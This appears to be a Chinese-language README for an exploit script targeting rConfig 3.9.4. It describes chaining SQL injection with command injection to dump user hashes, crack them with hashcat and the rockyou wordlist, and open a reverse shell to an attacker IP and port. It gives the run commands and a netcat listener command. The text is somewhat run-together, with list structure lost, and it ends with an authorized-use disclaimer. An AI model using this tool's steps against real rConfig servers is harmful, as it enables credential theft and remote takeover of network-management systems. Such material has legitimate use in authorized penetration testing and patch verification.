该PoC针对rConfig版本3.9.4,演示了通过SQL注入和远程命令注入漏洞的组合利用。它自动化了以下过程:
rockyou字典和best64.rules规则破解密码哈希此脚本基于并整合了两个原始PoC:
它被修改以自动化破解和可选的shell生成。
requests库(pip install requests)hashcat已安装并可通过命令行访问rockyou.txt字典(或等效文件)位于/usr/share/wordlists/rockyou.txt/usr/share/hashcat/rules/best64.rule仅转储用户和哈希:
python3 rConfig_rce.py https://target
转储用户、破解密码并尝试RCE(需要攻击者IP和端口用于反弹shell):
python3 rConfig_rce.py https://target attacker_ip attacker_port
admin帐户进行命令注入阶段。nc -lvnp 80)来捕获反弹shell。此工具仅供授权的安全测试和教育目的使用。未经许可对系统进行未授权使用是违法且不道德的。